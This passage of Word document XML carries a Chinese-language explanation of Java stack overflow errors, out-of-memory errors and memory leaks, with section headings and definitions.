          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00861857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00861857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>线程栈溢出（</w:t>
      </w:r>
      <w:r w:rsidRPr="00861857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java.lang.StackOverflowError</w:t>
      </w:r>
      <w:r w:rsidRPr="00861857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00F41A4C" w:rsidRDefault="00ED1D14" w:rsidP="00ED1D14">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00175DF4" w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>线程栈时线程独有的一块内存结构，所以线程栈发生问题必定是某个线程运行时产生的错误。一般线程栈溢出是由于递归太深或方法调用层级过多导致的。发生栈溢出的错误信息为：</w:t>
      </w:r>
      <w:r w:rsidR="00175DF4" w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java.lang.StackOverflowError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00AC5F97" w:rsidRDefault="001F635C" w:rsidP="00A84AB8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00122671">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存溢出与内存泄漏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>关于内存最常见的错误应该是这两个：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内存溢出</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Out Of Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>OOM</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内存泄露</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Memory Leak </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ML</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、内存溢出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内存溢出发生在这种状况下：</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内存完成</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Minor GC </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>之后想要把还存活的对象放到</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Old</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>区</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>里，但是这时</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Old</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>区</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>已经满了，同时</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Permanent</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>区也已经放不下存活的对象。这时就会产生</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> OOM </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、内存泄露</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018487C" w:rsidRPr="0018487C" w:rsidRDefault="0018487C" w:rsidP="0018487C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中，内存泄漏就是存在一些被分配的对象，这些对象有下面两个特点，首先，这些对象是有被引用的，即在有向树形图中，存在树枝通路可以与其相连；其次，这些对象是无用的，即程序以后不会再使用这些对象。如果对象满足这两个条件，这些对象就可以判定为</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中的内存泄漏，这些对象不会被</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>所回收，然而它却占用内存。</w:t>
      </w:r>
    </w:p>
